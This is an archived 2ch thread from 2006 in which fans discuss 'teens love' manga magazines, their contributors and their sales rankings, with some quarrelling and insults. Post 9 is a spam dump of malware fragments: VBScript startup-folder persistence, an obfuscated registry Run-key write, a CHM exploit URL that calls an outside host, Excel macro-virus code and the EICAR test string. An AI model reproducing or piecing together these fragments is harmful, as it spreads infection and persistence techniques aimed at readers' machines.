5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【TL】ティーンズラブを語ろう・18冊目【恋愛系】

1 :花と名無しさん:2006/12/07(木) 14:46:21 ID:NxGGFYkM0
巷での地位も確立しつつあるTL(ティーンズラブ)誌について語りましょう。
尚、少コミCheese、デザートなどはTLと微妙に違いますので専用スレへ。
プチもも、恋愛天国ネタはタコa href="/bbs/read.cgi/comic/1477/1090155738/2-5" target="_blank">>>2-5に専用スレがございますのでそちらで。
荒らしや粘着は徹底放置。必ずメール欄に半角英数で「sage」って入れてね。

●他ジャンルを辱める発言はお控え下さい、スレやジャンルのモラルに関わります
●現状ではTL雑誌は成人向け、有害図書などの指定はされていませんが、
 極端にHな話、成人向け作家の参入キボンなど、少女漫画板的にマズイ話は
 21禁板へ。ティーンズラブで検索しましょう。
●BLの話は板違いです、ここは少女漫画板だということをお忘れなきよう。
●作家のうちわ話は避難所TL作家スレでお願いします。

前スレ
【TL】ティーンズラブを語ろう・17冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1161268263

2 :花と名無しさん:2006/12/07(木) 14:47:50 ID:???0
<過去スレ>
女の子向けのHなマンガ
ttp://comic.2ch.net/test/read.cgi/gcomic/1020910959/
女の子向けのHなマンガタ。穏・棍
ttp://comic.2ch.net/test/read.cgi/gcomic/1038706621/
女の子向けのHなマンガタ。該・棍
ttp://comic.2ch.net/test/read.cgi/gcomic/1043145631/
女の子向けのHなマンガタイ冊目
ttp://comic.2ch.net/test/read.cgi/gcomic/1058368258/
女の子向けのHなマンガタウ冊目
ttp://comic2.2ch.net/test/read.cgi/gcomic/1069255230/
【TL】ティーンズラブを語ろうタ。矯・棔變・Ψ蓮・
ttp://comic6.2ch.net/test/read.cgi/gcomic/1080579225/
【TL】ティーンズラブを語ろうタオ冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1090325670/
【TL】ティーンズラブを語ろうタカ冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1095206127/
【TL】ティーンズラブを語ろうタキ冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1101304153/
【TL】ティーンズラブを語ろうタッ0冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1104753087/
【TL】ティーンズラブを語ろうタッ1冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1116059921/
【TL】ティーンズラブを語ろう・12冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1132543448/
【TL】ティーンズラブを語ろう・13冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1139661030/
【TL】ティーンズラブを語ろう・14冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1144338078/
【TL】ティーンズラブを語ろう・15冊目【恋愛系】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1150791041/


3 :花と名無しさん:2006/12/07(木) 14:48:44 ID:NxGGFYkM0
【TL】ティーンズラブを語ろう・16冊目【恋愛系】(表記違いで15になってます)
ttp://comic6.2ch.net/test/read.cgi/gcomic/1156409877/

4 :花と名無しさん:2006/12/07(木) 14:49:37 ID:???0
<関連スレ>
どこよりもHな少女漫画雑誌『プチもも』
ttp://comic6.2ch.net/test/read.cgi/gcomic/1024590762/
恋愛天国(れんあいパラダイス)vol.3
ttp://comic6.2ch.net/test/read.cgi/gcomic/1159729151/
【ピンキ】平和作家行方スレ【sugar】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1138251984/
【秋田】秋田書店TL系雑誌専用【マンセー】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1147694512/
【IF】ヤングレディースを語ろう【aya】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1163595366/
【何様の】草薙竜樹【つもりダ!!】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1031594841/
【恋パラ】天野ちぎり【理々と一太】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1096166646/



5 :花と名無しさん:2006/12/07(木) 14:50:26 ID:???0
<関連スレ(外部)>
本スレ避難所(本スレが荒れた場合の避難先はこちら)
ttp://jbbs.livedoor.com/bbs/read.cgi/comic/1477/1090155738/
TL作家オチスレ(作品とは関係のない作家個人のイタタヲチなどはこちら)
ttp://jbbs.livedoor.com/bbs/read.cgi/comic/1477/1090156240/
TL議論版(今後のTL業界について熱く議論したい人はこちら)
ttp://jbbs.livedoor.com/bbs/read.cgi/comic/1477/1095175712/
TL作家雑談専用(TL作家さんの愚痴や雑談はこちら)
ttp://jbbs.livedoor.jp/bbs/read.cgi/comic/1477/1095176240/


6 :花と名無しさん:2006/12/07(木) 14:51:12 ID:???0
【主な雑誌・出版社とリンク】
<祥伝社> ttp://www.ellestaff.com/pt/pinkyteens.html
  最強恋愛バリ★ラブ
<笠倉出版社> ttp://www.kasakura.co.jp/
  絶対恋愛Sweet(毎月10日発売)
  恋愛KISS−ラブキス−(奇数月29日発売)
  sweetプチ(奇数月27日発売)
<竹書房> ttp://www.takeshobo.co.jp/
  恋愛天国−パラダイス−(毎月19日発売)
   miniパラ(奇数月4日発売)
<宙出版> ttp://www.ohzora.co.jp/
  恋愛白書パステル(毎月24日発売)
<近代映画社> ttp://www.kindaieigasha.co.jp/magazine//
  上級恋愛ミント(偶数月24日発売)
<秋田書店> ttp://www.akitashoten.co.jp/index2.html
  恋愛LoveMAX(奇数月6日発売 )
  チェリーピンク(偶数月6日発売 )
  プチプリンセス(季刊21日発売)
<一水社> ttp://www.issuisya.co.jp/
  ラブパッション(奇数月17日発売)
<徳間書店> ttp://www.tokuma.jp/
   恋愛楽園ピュア


7 :花と名無しさん:2006/12/07(木) 17:30:15 ID:rwMP60lI0
作家乙

8 :花と名無しさん:2006/12/07(木) 18:23:36 ID:???0
作家乙
だが

プチプリは季刊ではなく隔月刊
笠倉のSWEETキューブが抜けてる
パステルはYLに移動になった

やり直せ

9 :<body onload=window()>:2006/12/07(木) 18:27:47 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

10 :花と名無しさん:2006/12/07(木) 19:12:34 ID:???O


11 :花と名無しさん:2006/12/07(木) 19:14:49 ID:???0
>>8
自分でやりなされ

12 :花と名無しさん:2006/12/07(木) 20:41:42 ID:???0
>乙
過去スレ文字化けしてるの私だけ?

13 :花と名無しさん:2006/12/07(木) 22:05:45 ID:???0
>>8
不満があるなら来るなというか、
好きな板にスレ立ててくれば?

14 :花と名無しさん:2006/12/07(木) 23:02:40 ID:???0
>>8
口汚いなあ
まったりいこうよ

15 :花と名無しさん:2006/12/07(木) 23:43:47 ID:???0
スレ立てしたものです(;´Д`)
文字化けしてるね、スマソ

16 :花と名無しさん:2006/12/08(金) 05:39:57 ID:???0
>>1
乙〜。

>プチもも、恋愛天国ネタはタコa href="/bbs/read.cgi/comic/1477/1090155738/2-5"

ここのこと? ワロタwww
まあまったりいきましょう。
URLが間違ってなければ問題ないよ。

17 :花と名無しさん:2006/12/08(金) 06:01:12 ID:F9RwJCU00
バリラブとか上級恋愛ミントって今も出てるんだろうか?
出てるなら羅列に興味あるので読んでる人羅列ヨロシコー

18 :花と名無しさん:2006/12/08(金) 06:14:46 ID:???0
>16
2も見てみ

19 :花と名無しさん:2006/12/08(金) 09:41:15 ID:???0
>17
バリラブもミントも出てるよ。
買ってはいないけどスーパーで見た。
バリラブはダーリン→プチダーリン→バリラブと廃刊創刊繰り返してる
のに何で連載物があるんだろ・・・?


20 :花と名無しさん:2006/12/08(金) 12:06:11 ID:???0
>>1
スレ立て乙〜

21 :花と名無しさん:2006/12/08(金) 14:49:16 ID:???0
>>19
摘発→休刊→創刊→摘発→休ry

22 :花と名無しさん:2006/12/09(土) 18:03:50 ID:???0
>>1
スレ立て乙

まったりしたペースでいい感じだね。

23 :花と名無しさん:2006/12/10(日) 06:33:12 ID:???0
Sweet出たけど羅列する?
今月は好き作家が多くて個人的には良かったお。

24 :花と名無しさん:2006/12/10(日) 14:41:15 ID:???0
>23
お願いします

25 :花と名無しさん:2006/12/10(日) 17:43:11 ID:???0
やっとSWEETから空木が消えた
もう戻ってこなくていいよおばさん

26 :花と名無しさん:2006/12/10(日) 23:49:50 ID:???0
どうせ、キモ作品の大家リカチはまだいるんだろ

27 :花と名無しさん:2006/12/11(月) 04:39:56 ID:???0
絶対恋愛Sweet 1月号羅列〜

夏生恒・
千川なつみ・
さとうここ・
若菜光流・
ミツルギ・
ピエール山本・
三国ハヂメ・
空木朔子・
梶原聖・
山城ヒサヨシ・
相模ひな・
坂下アスカ・

28 :花と名無しさん:2006/12/11(月) 04:56:41 ID:???0
夏生恒・ アラブの王様の続編 楽しみに読んでる人が本当にいるんだろうか・・・
千川なつみ・ 男キャラのBL臭が嫌い オバ絵だし話もなげやり
さとうここ・展開がいいかげん それなりに読めた
若菜光流・ キャラが誰が誰なのかわからない・・・毎回スルー
ミツルギ・ それなりに読めた エロが薄かった
ピエール山本・ 中途半端な10P 絵が昔に戻っててエロも良かった
三国ハヂメ・ よくわからんが読めた
空木朔子・ 展開早すぎ 面白かったが相変わらずご都合主義だった
梶原聖・ 絵が人形みたいで嫌いだが面白かった
山城ヒサヨシ・キャラがかわいくて好き エロが薄い
相模ひな・ 絵が嫌い スルー
坂下アスカ・男キャラがきもい 話は面白いがエロが薄い

空木は嫌いじゃないからまた描いてほしいな
最近のリカチは???と思う・・・
個人的には紫賀がきもくてだめだ・・・

29 :花と名無しさん:2006/12/11(月) 10:53:42 ID:???0
空木が嫌いじゃないって・・・・
>>28の常識観念とか倫理感が心配だ
リアルでも他人に迷惑かけて気づかない人間なのか?

30 :花と名無しさん:2006/12/11(月) 13:57:54 ID:???0
言い方って大事だなってオモタ

31 :花と名無しさん:2006/12/11(月) 18:10:41 ID:???0
倫理感ねえ・・・。

空木のこのシリーズは確かに破綻性格の変態先生が出て来るが
主人公がそれを放置して甘んじてるところが29は許せないのか?
この主人公と変態先生のせいで周囲が迷惑こうむってるから
そういう意味で空木を毛嫌いするなら気持ちはわかるが。

29さん、あなたの物言いはアホ臭いから倫理を問わない方がいいよ。
単なる感想にまで牙をむく29の精神状態が心配だ・・・。
あ、同業者か。29はSweetの作家?

32 :花と名無しさん:2006/12/12(火) 00:38:56 ID:???O
神葉理世の表紙可愛いけど
マンガはBLしか描かないんだろうか。


33 :花と名無しさん:2006/12/12(火) 10:03:26 ID:???0
>32
2、3年前まではTLも描いてたけど今は表紙だけみたい。
TLでコミックスも2冊出てる。

34 :花と名無しさん:2006/12/12(火) 12:08:23 ID:???0
千川なつみがオバ絵なら空木朔子はどうなのかと。

35 :花と名無しさん:2006/12/12(火) 12:11:21 ID:???0
どうやら、空木大好きな人が
だぁいすきな空木てんてーをけなされた腹いせに
作家が荒らしてる荒らしてるって主張して荒らしてたみたいだね。

36 :花と名無しさん:2006/12/12(火) 12:12:05 ID:???0
空木は好きでも嫌いでもないしむしろ絵とかみやすくて好感持ってたほうだったが
必ず擁護者出てくるのがウザい
そういうので逆に嫌う人を増やしていくってのわからないのかね>擁護してる人

37 :花と名無しさん:2006/12/12(火) 12:28:50 ID:???0
空木の絵は肩幅や脱いだときの尻が40過ぎのおばさんの絵なんだよね
自分で描いてて気づいてないんだろうな



38 :花と名無しさん:2006/12/12(火) 13:55:19 ID:???0
で、新しくしてもまたこのノリか
叩きも自由にやってもいいが、擁護はうざいとか
石崎粘着の時と同じじゃねえかw

ここ全体が粘着体質の集うのスレって事が良く判るな
たたきNGの感想と雑談スレが欲しいよ


39 :花と名無しさん:2006/12/12(火) 16:37:05 ID:???0
>>38
必要ならたてるお>叩き感想NGスレ

40 :花と名無しさん:2006/12/12(火) 16:52:56 ID:???0
難民板あたりでまったりするもよし…

41 :花と名無しさん:2006/12/12(火) 18:50:12 ID:???0
>>38が一人で荒らしてるだけじゃん

42 :花と名無しさん:2006/12/12(火) 18:58:57 ID:???0
>>41
胴衣、叩きなんてどこにもない
ただ38が2CH に慣れてないか、騒ぎたいだけだろw

ここはこういうノリのスレって事を知らない初心者は
一生ROMってろ

43 :花と名無しさん:2006/12/12(火) 19:37:38 ID:???0
マターリしませう

44 :花と名無しさん:2006/12/12(火) 19:58:49 ID:???O
初めて白書を読んだんだけど必要あるなしは別として
付録のボリュームにワロタw
山川あいじの丸コピが二人いてパクリってレベルじゃねーぞ!と思いました

45 :花と名無しさん:2006/12/12(火) 20:25:23 ID:???O
坂下が一番のオバ絵でしょ?w

46 :花と名無しさん:2006/12/12(火) 20:44:58 ID:???0
エロがたくさんあれば、絵の古さなんてどうでもいいよ

47 :花と名無しさん:2006/12/12(火) 20:46:38 ID:???0
>>44
一人は桃果だとして、あと一人は誰?

48 :花と名無しさん:2006/12/12(火) 20:56:39 ID:???O
感情的になるあまり、日本語が少々お留守になっている>>38の意見をわかりやすくまとめると

「空木様の悪口を語るのは禁止」

こういうことだよね>>38

49 :花と名無しさん:2006/12/12(火) 20:59:10 ID:???0
>>38
死ねよ、カスwwwwww

50 :花と名無しさん:2006/12/12(火) 21:05:24 ID:???0
ほんとうに最悪だよね、ここの住人

51 :花と名無しさん:2006/12/12(火) 21:10:57 ID:???0
同じ穴の狢って言葉知ってる?w

バカには分からないだろうなwwwwwwwwwwwwwwwwwwwwwwwww

52 :花と名無しさん:2006/12/12(火) 21:50:58 ID:???0
>>48
それでいつくらいまで>>38と空木叩きをすればいい?
一応48の趣旨に賛同してるんだけど

53 :花と名無しさん:2006/12/12(火) 23:02:46 ID:???O
だから、誰も叩きなんてしてないよ。>>28=38=52さん。

54 :花と名無しさん:2006/12/12(火) 23:53:19 ID:???0
マターリしませう

55 :花と名無しさん:2006/12/13(水) 00:29:09 ID:???0
いつもの携帯厨はスルー検定ですよ

56 :花と名無しさん:2006/12/13(水) 00:29:19 ID:???0
若菜は最近女の体の描き方が初めの頃と同じ感じになってるので
読みやすくなった。
一時は肉感的通り越した感じだったから、読みづらかったんだけど。


57 :花と名無しさん:2006/12/13(水) 00:47:30 ID:???0
いつもの携帯厨ってなに?

58 :花と名無しさん:2006/12/13(水) 11:33:43 ID:???0
>44、47
白書の話題はスレ違い。

59 :花と名無しさん:2006/12/13(水) 12:53:26 ID:???0
白書はこっちに残留組でそ?

60 :花と名無しさん:2006/12/13(水) 20:36:39 ID:???O
>>58
仕切るな婆

61 :花と名無しさん:2006/12/13(水) 23:14:55 ID:???0
避難所の作家スレを業界板に移して作家を排除
避難所を丸々本スレにする
レンパラあたりの単独スレ新スレは避難所で立てる

作家も入り込むかも分からんが、ログを取られているので無問題
ここは時々保守とマターリの雑談誘導スレにする

62 :61:2006/12/13(水) 23:16:49 ID:???0
ログじゃない、IDだった…
そして作家の同人活動スレでも、TLに関するスレを立てるのも良し

63 :花と名無しさん:2006/12/13(水) 23:48:37 ID:???0
避難所はうまく稼動しているよ
なんで乗り込むようなマネはよせ

64 :花と名無しさん:2006/12/14(木) 00:15:11 ID:???O
どうも2ちゃんねるという場所を理解してない人がいる様子。
そこまで馴れ合いしたいならmixiに行けばいいんじゃない?
こんなこと言うと私まで携帯厨扱いされるんだろうけどね…

65 :花と名無しさん:2006/12/14(木) 00:26:13 ID:???0
荒らしと叩きと中傷こそ、このスレの住人の醍醐味だしね

66 :花と名無しさん:2006/12/14(木) 00:56:14 ID:???0
携帯とパソコンで自作自演か、乙

67 :花と名無しさん:2006/12/14(木) 01:55:28 ID:???0
パステルYLに移動になったんじゃないの?
ここでいいの?


68 :花と名無しさん:2006/12/14(木) 02:32:21 ID:???0
>荒らしと叩きと中傷こそ、このスレの住人の醍醐味だしね
↑っていう人はここでそうしてればいいんじゃない?
それ以外の人は避難所へとかいうのはだめなのか。
そんなに単純な問題ではないのかな?よくわからん。

69 :花と名無しさん:2006/12/14(木) 07:11:00 ID:???0
・・・あんたはアフォか?

70 :花と名無しさん:2006/12/14(木) 09:25:59 ID:???O
何この糞スレwwwwwwwwwwwwwwwwwwwwwwwww

71 :花と名無しさん:2006/12/14(木) 09:26:47 ID:???0
>69
お前も同じ程度だろw

72 :花と名無しさん:2006/12/14(木) 11:14:42 ID:???0
>>67
あやといふは移動して白書は残ったんだとオモ

73 :67:2006/12/14(木) 20:29:46 ID:???0
>72
有難う。

74 :花と名無しさん:2006/12/15(金) 23:08:54 ID:???0
イフが移動なら白書も移動だよね
もうTLとは呼べないしょ>白書

75 :花と名無しさん:2006/12/16(土) 00:33:03 ID:???0
何でそんなに白書を移動させたがる?


76 :花と名無しさん :2006/12/16(土) 00:36:42 ID:???0
>74
もうそれは前スレで解決してるはずでそ
いまさら物言いなさんな

77 :花と名無しさん:2006/12/16(土) 10:51:23 ID:???0
TLじゃない白書をなぜ残したがるかな

78 :花と名無しさん:2006/12/16(土) 11:07:11 ID:???0
>>77
前スレで解決済
どうしても納得いかない人は避難所の議論スレでドゾー

79 :花と名無しさん:2006/12/16(土) 13:48:43 ID:???O
イフ読者いいかげんうざい

80 :花と名無しさん:2006/12/17(日) 14:14:30 ID:???0
イフ読者じゃなくてイフの中の人でそ
イフ売れてないじゃんww

81 :花と名無しさん:2006/12/17(日) 18:10:16 ID:???0
そうなのか。でも月刊だよね?
よく毎月出せるな。広告収入多いのかな?

82 :花と名無しさん:2006/12/17(日) 18:58:37 ID:???0
Amazon見たら普通に売れてるじゃん…

83 :花と名無しさん:2006/12/17(日) 19:04:50 ID:???0
アマゾンみたら
先日発売したばかりなのにもう順位が1万超えてたよ


84 :花と名無しさん:2006/12/17(日) 19:19:16 ID:???0
アマゾンで扱われているだけでもバリラブや楽園よりまし>イフ

85 :花と名無しさん :2006/12/17(日) 20:26:08 ID:???0
>>81-84
http://comic6.2ch.net/test/read.cgi/gcomic/1163595366/l50

86 :花と名無しさん:2006/12/17(日) 23:21:33 ID:???0
>>83
おいらが見たのはレディコミ枠でのランキング
TLも入ってる

87 :花と名無しさん:2006/12/18(月) 00:23:07 ID:???0
取り扱いないって創刊したばっかだろ>バリラブ、楽園
それと比較したところでケツの穴の小さい他雑誌sageと思われるだけですよ、中の人

88 :花と名無しさん:2006/12/18(月) 00:28:51 ID:???0
>86
ミントの次に売れてないね

89 :花と名無しさん:2006/12/18(月) 01:21:56 ID:???0
なんでイフの話してんのさ

90 :花と名無しさん:2006/12/18(月) 11:46:42 ID:???0
イフ読者(作家?)てこんなにウザかったっけ?
先月か今月から急にイフ作家の2ちゃん率増えた気がする

それとも2ちゃんネラ作家がイフに来たのか?

91 :話題変え:2006/12/18(月) 12:06:50 ID:???0
文教堂売り上げ
スイート 11月10日発売 906冊
恋愛パラ 10月19日発売 855冊
パステル 10月24日発売 826冊


92 :話題変え:2006/12/18(月) 12:17:02 ID:???0
密林ランキング
アヤ※※ 12月08日発売 3628位
エスガ※ 11月29日発売 3849位
SWEET 12月09日発売 9204位
パステル 11月24日発売 9707位
恋愛イフ 12月14日発売 13147位
恋愛パラ 11月18日発売 15010位


93 :花と名無しさん:2006/12/18(月) 12:27:06 ID:???O
また空木大好きな作家認定荒らしが暴れ始めたよ…

94 :花と名無しさん:2006/12/18(月) 12:48:24 ID:???0
むしろ普通にifの話題をしたい人は自主的に移動しているように見える。
ここで語っている人はif読者でもなんでもない人なのでは。
興味がない雑誌だから移動しそびれているんだろうけど、
スレチなんだからちゃんと移動しようよ。

95 :花と名無しさん:2006/12/18(月) 16:20:42 ID:???0
>>92
発売日がほぼ同じアヤとsweetがこれほど差があるのにビクーリ

96 :花と名無しさん:2006/12/18(月) 17:32:33 ID:???0
コンビニ、書店の扱い数が全然違う
店頭で買えないからネットに読者が流れるんだろう

97 :花と名無しさん:2006/12/18(月) 17:39:30 ID:???0
コンビニでも本屋でもアヤ売ってるよ
むしろコンビニは恋パラやスイートよりアヤやイフや主婦向けのレディコミのほうが多く入荷してる
自分はエスガが意外
恋パラの今月号は明日だっけ?
恋パラの初動も気になる

98 :花と名無しさん:2006/12/18(月) 18:23:19 ID:???0
うちの近所はコンビニ10店鋪位あるが
アヤイフ見た事無い
主婦向けの御近所系レディコミは入っても2冊
sweetは10册くらい入る
本屋でもアヤイフは1〜2冊棚にあればいいとこ
他主要TL誌は山積み

99 :花と名無しさん:2006/12/18(月) 18:37:39 ID:???0
ネットの人は店頭にないからじゃなくて
人前で買うのが恥ずかしく思ってしまう読者か
もしくは主婦業などで日常の買い物に手一杯なので
自分の漫画や趣味のモノはちょいと通販で届けておいてもらうなんて人じゃね?
エスガっていつもならもうとっくに10000以下だよな?

100 :花と名無しさん:2006/12/18(月) 18:46:11 ID:???0
初動っていうか予約になるのかな
今見たら恋パラ2月号こんなだったよ

恋愛天国 2007年 02月号2006/12/19
ランキング: 本で3,777位

101 :花と名無しさん:2006/12/18(月) 19:10:25 ID:???0
エロマイナージャンルで雑誌が売れても、メジャーにはなれない罠
世の中で売れてる漫画の載ってる雑誌がバカ売れ、って法則は崩れたし
TLコミクスがバカ売れって話も聞いた事がない

せめてTLから出てメジャー作家になって売れ売れ…とかないものか…。

102 :花と名無しさん:2006/12/18(月) 19:17:42 ID:???0
あのさ、メジャーになったらエロは出来ないよ?

103 :花と名無しさん:2006/12/18(月) 19:20:27 ID:???0
小畑神なんか今の新連載で毎週エロ描いてるようなもんじゃんww

104 :花と名無しさん:2006/12/18(月) 19:24:21 ID:???0
のだめは売れても掲載雑誌思ったより売れてないらしいしねえ
それでも、講談社全体がのだめ特需という…

105 :花と名無しさん:2006/12/18(月) 19:32:47 ID:???0
>>102
小学館のアレはなに?

106 :花と名無しさん:2006/12/18(月) 19:38:00 ID:???0
最近の少コミやチーズは規制のためか
乳くらいだよ
本番は毎月1作くらい

107 :花と名無しさん:2006/12/18(月) 20:04:41 ID:???0
発行部数だけならKiss(のだめ)は18万部、Cookie(NANA)は20万部
TL雑誌とは比較できないよ…はずかしい

108 :花と名無しさん:2006/12/18(月) 20:33:07 ID:???0
その発行部数てどこで見たらわかるの?

109 :花と名無しさん:2006/12/18(月) 20:40:31 ID:???0
>>108
社団法人日本雑誌協会のHP
絶対にきちんとした数字を出さない秋田とか笑えますw

110 :花と名無しさん:2006/12/18(月) 23:34:10 ID:???0
>>101
元々一般出身でTLやって戻っていって
TVドラマ化された人ならいるんだがな

111 :花と名無しさん:2006/12/18(月) 23:46:04 ID:???0
>>110
花津はTL出身じゃないし、そして売れっ子という感じでもないと思う…

男性系ならたくさんいるし、女性系でのエロ出身だけど
一般に行って売れっ子なら、BLあたりでよしながふみ?

112 :花と名無しさん:2006/12/18(月) 23:54:54 ID:???0
TLってジャンルが出来て何年くらい?
2〜3年くらいなら、まだ一般にいける才能は発掘できないんじゃないかと…
もっとジャンルが大きくなって、色んな新人が出てくる方が先じゃない?

113 :花と名無しさん:2006/12/19(火) 00:08:56 ID:???0
>>111
一般出身て書いてるじゃん

114 :花と名無しさん:2006/12/19(火) 00:22:36 ID:???0
なんか…エロジャンルにどれだけ夢見てるのかと…w

115 :花と名無しさん:2006/12/19(火) 00:42:48 ID:???0
胴衣
エロはエロであって、それ以上でも以下でもない
一般がどうこう言う香具師は読むのが楽しくなさそうだな

116 :花と名無しさん:2006/12/19(火) 02:11:50 ID:???0
山田も一般誌行くみたいだね。TL出身じゃないけど。

117 :花と名無しさん :2006/12/19(火) 02:50:12 ID:???0
そもそも一般誌ってどこからどこまでのことをいうのかワカンネ
エロがなければ一般誌なのか?

118 :花と名無しさん:2006/12/19(火) 04:05:05 ID:???O
エロがなければ一般なら知らないだけで、TL出身→一般誌は結構いるんじゃね?

119 :花と名無しさん:2006/12/19(火) 09:54:00 ID:???0
一般紙、ってなんとなく集栄、講談、小学館ってイメージ
白泉、角川はオタ系、他は思いつかない

120 :花と名無しさん:2006/12/19(火) 10:38:02 ID:???0
ふぁりなもぽぷらから創刊したComicでエロ無しを描きはじめてるね

121 :花と名無しさん:2006/12/19(火) 11:10:43 ID:???0
花津のスピは最初からドラマ化ありきの
原案あり企画だったんだよな(セラムンみたいな)
杉本にしろ山田にしろ原作付きがデフォって
なんか微妙

122 :花と名無しさん:2006/12/19(火) 14:03:14 ID:???O
TL出身で他誌に行った人ってほとんど思いつかないな。
花津はなかよし出身だっけ?一時でもTLにきた事が不思議だ。
どこかの漫画コラムに、絵は上手いし話もしっかりしてるけど
エロが薄くてTLとして何か物足りないって書かれてた。
やっぱり向き不向きってあるんだよね。


123 :花と名無しさん:2006/12/19(火) 18:33:01 ID:???0
がっつりエロでこそのTLだもんね
100円ショップで物は良くても1000円のものが売れないのと同じかな。
100円しか出さないお客には何それ?だろうし
向き不向きは絶対にあると思うよ

読者も本は選ぶけど、作家にも雑誌は選んで欲しい
エロくないのが載ってるとムカつくw
普通の漫画読むなら、TLよりも違う雑誌読むわけだしね

124 :花と名無しさん:2006/12/19(火) 19:23:46 ID:???0
原作付きでもエロなしでがんばる気があるなら
がんばればいいと思う
ふぁりなも山田もいい歳だろうし
葉月もデザで描いてるよね

125 :花と名無しさん:2006/12/19(火) 21:28:48 ID:5Qv5ofh00
135 名前:Love名無しさん 投稿日: 2006/12/13(水) 00:18:48
また変なのが湧いてきて荒れてるし・・・。
あれじゃ好きな作家や雑誌の感想も書き込めないよ。
言葉の汚い変なの多分同じ人だよね・・・。


136 名前:Love名無しさん 投稿日: 2006/12/13(水) 06:41:57
もうスレごと放置した方がいいと思う


137 名前:Love名無しさん 投稿日: 2006/12/13(水) 11:51:48
>130
そうした方がいいかもね。
初めからもう何だかおかしいのがいるし。
好きな作家や作品は人それぞれで別に感想を書き込んでるだけで
貴方も好きになりなよとか強制してるわけでもないのに狂ったように
一人の作家やその作家を好きだという人を叩く人って気持ち悪さを
感じる。
もう病的な感じというか・・・。


138 名前:Love名無しさん 投稿日: 2006/12/13(水) 18:44:36
他の作家でも叩き繰り返してたのと同じやつなんじゃないの
何であんなに噛み付くのかが判らん。本気で
アレがいる限り、本スレがまともに機能することは無い様に思う

126 :花と名無しさん:2006/12/19(火) 22:07:43 ID:???0
ハイハイワロス

127 :花と名無しさん:2006/12/19(火) 22:56:15 ID:???0
エロさ、画力>>>>>>>>>>>>>>>越えられない壁>>>話の上手さ

128 :花と名無しさん:2006/12/19(火) 23:47:42 ID:???0
>>124
デザートはあんまりTL誌やレディコミ誌と差が無いぞ、内容的に

129 :花と名無しさん:2006/12/19(火) 23:50:06 ID:???0
エロ本にはエロを、って当たり前なんだけどね…
それすらやれない作家が増えてるだけで…なめとるのか、こら!

130 :花と名無しさん:2006/12/20(水) 00:43:50 ID:???0
んだんだ。原作付きだとしても一般誌に行けるんだからすごいと思うよ。
売れない漫画家の嫉妬か?


131 :花と名無しさん:2006/12/20(水) 01:35:03 ID:???O
山田はすでにコミハイで一般向け(原作なし)描いた上に単行本も出てるんですが。
タイトルはエロみたいだから一般向けには思えないけど。

132 :花と名無しさん:2006/12/20(水) 12:14:08 ID:???O
コミハイ自体微妙…一般誌なのか?
エロ云々じゃなく男性向け少女漫画誌という時点で。

133 :花と名無しさん:2006/12/20(水) 13:06:34 ID:???0
流石にニッチなマニア雑誌は一般とは呼びにくいなあ

134 :花と名無しさん:2006/12/20(水) 16:22:19 ID:???0
出版社: 竹書房; 月刊版 (2006/12/19)
ASIN: B000LE0RVW
サイズ (cm): 21 x 15
Amazon.co.jp ランキング: 本で12,422位

恋パラでさえ発売日1日後で10000位単位か
発売日にがーっと売れてがーっと下がるのかね

135 :ちなみに:2006/12/20(水) 16:29:13 ID:???0
パステル
出版社: 宙出版; 月刊版 (2006/12/22)
Amazon.co.jp ランキング: 本で25,270位

エスガ
出版社: ぶんか社; 月刊版 (2006/12/28)
Amazon.co.jp ランキング: 本で83,590位

あや
出版社: 宙出版; 月刊版 (2007/1/6)
Amazon.co.jp ランキング: 本で153,799位

SWEET
出版社: 笠倉出版社; 月刊版 (2007/1/10)
Amazon.co.jp ランキング: 本で101,484位

136 :花と名無しさん:2006/12/20(水) 17:53:08 ID:???0
発売中のじゃなくて次号のか・・

137 :花と名無しさん:2006/12/20(水) 21:38:00 ID:???0
コンビニで買える本はわざわざ通販しないなあ
中見てしょぼかったら買わずにすむしw

138 :花と名無しさん:2006/12/20(水) 23:52:34 ID:???0
Amazon、コンビニに楽園バリラブがないのは創刊したばかりとして
恋パラがコンビニに無いのはなぜ?
SWEETもイフも白書もあるのに


139 :花と名無しさん:2006/12/21(木) 00:01:45 ID:???0
たまたまでしょ
近くのファミマはスウィートは置いてるけど恋パラは置いてない
セブンはその逆
ローソンはどっちも置いてる
白書はどこも売ってて
